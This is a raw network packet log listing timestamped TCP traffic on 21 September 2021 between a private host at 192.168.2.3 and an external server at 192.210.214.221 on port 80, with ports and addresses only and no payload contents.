Sep 21, 2021 21:34:34.338614941 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338614941 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.338634014 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338650942 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338654041 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.338669062 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338687897 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338704109 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338721037 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338738918 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338740110 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.338759899 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338773966 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338785887 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338798046 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.338887930 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.338932037 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.338937998 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.339199066 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.486624956 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.486658096 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.486670971 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.486682892 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488106966 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488523006 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488662958 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488676071 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488688946 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488699913 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488712072 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488724947 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488737106 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488748074 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488759995 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488770962 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488781929 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488791943 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488804102 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488815069 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488827944 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488840103 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488852024 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488862991 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488873959 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488884926 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488895893 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488907099 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488918066 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488929033 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488939047 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488950014 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488961935 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488972902 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488985062 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.488996029 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489007950 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489018917 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489029884 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489041090 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489052057 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489063025 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489073992 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489084959 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489095926 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489105940 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489116907 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489128113 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489139080 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489149094 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489159107 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489171028 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489181995 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489192009 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489204884 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489214897 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489226103 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489237070 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489248991 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489260912 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489272118 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489281893 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489293098 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489305019 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489315987 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489327908 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489340067 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489351034 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489362001 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489372015 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489384890 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489396095 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489407063 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489418030 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489429951 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489442110 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489454031 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489464045 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489475012 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489486933 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489499092 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489510059 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.489520073 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.493674994 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.493762970 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.519534111 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642112970 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642149925 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642164946 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642188072 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642206907 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642225027 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642244101 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642261982 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642268896 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642280102 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642299891 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642318010 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642318010 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642340899 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642360926 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642378092 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642379045 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642400026 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642406940 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642421007 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642438889 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642442942 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642458916 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642476082 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642482996 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642498016 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642518044 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642530918 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642534971 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642554045 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642564058 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642573118 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642591953 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642600060 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642608881 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642625093 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642626047 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642649889 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642668009 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642676115 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642685890 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642705917 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642724037 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642725945 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642740965 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642759085 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642765045 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642776966 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642785072 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642798901 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642817974 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642818928 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642836094 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642853022 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642854929 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642869949 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642885923 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642901897 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.642911911 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.642947912 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643033981 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643053055 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643069983 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643086910 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643093109 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643105030 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643130064 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643140078 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643151045 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643160105 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643181086 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643207073 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643208981 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643230915 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643251896 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643253088 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643276930 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643296957 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643318892 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643331051 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643342018 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643361092 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643388987 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643398046 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643410921 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643438101 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643439054 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643460989 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643472910 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643485069 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643506050 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643527985 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643536091 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643548012 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643572092 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643573046 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643598080 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643619061 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643637896 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643642902 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643668890 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643671036 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643693924 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643701077 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643722057 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643748999 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643778086 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643785954 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643810034 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643824100 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643836021 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643857002 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643877983 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643894911 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.643897057 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.643934011 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.651576042 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.667424917 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.667469978 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.667494059 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.667515993 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.667540073 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.667553902 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.667565107 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.667589903 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.667612076 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.667615891 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.667643070 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.667670965 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.667675972 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.667694092 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.667699099 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.667742014 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.690454006 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794090033 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794122934 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794138908 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794161081 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794179916 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794197083 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794215918 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794220924 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794234037 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794253111 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794255972 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794277906 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794295073 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794296026 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794318914 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794327974 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794339895 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794363976 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794378042 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794383049 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794404984 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794423103 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794440031 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794450998 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794460058 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794465065 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794483900 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794483900 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794502974 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794514894 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794521093 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794538975 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794555902 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794565916 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794575930 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794594049 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794596910 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794610977 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794632912 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794641972 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794651985 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794668913 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794675112 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794687033 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794703960 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794708967 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794723034 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794742107 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794749022 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794759989 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794780016 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794790030 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794800997 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794817924 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794826031 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794836044 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794852972 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794859886 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794869900 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794887066 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794898987 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794903994 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794924974 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794929028 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794944048 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794960976 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794970036 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.794980049 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.794997931 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795002937 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.795017004 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795034885 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795038939 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.795057058 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795078039 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.795078039 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795099020 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795126915 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.795166969 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795185089 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795200109 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795217037 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795237064 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795247078 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.795258045 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795283079 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795285940 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.795301914 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795309067 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.795319080 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795336962 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795344114 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.795356035 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795373917 CEST	80	49742	192.210.214.221	192.168.2.3
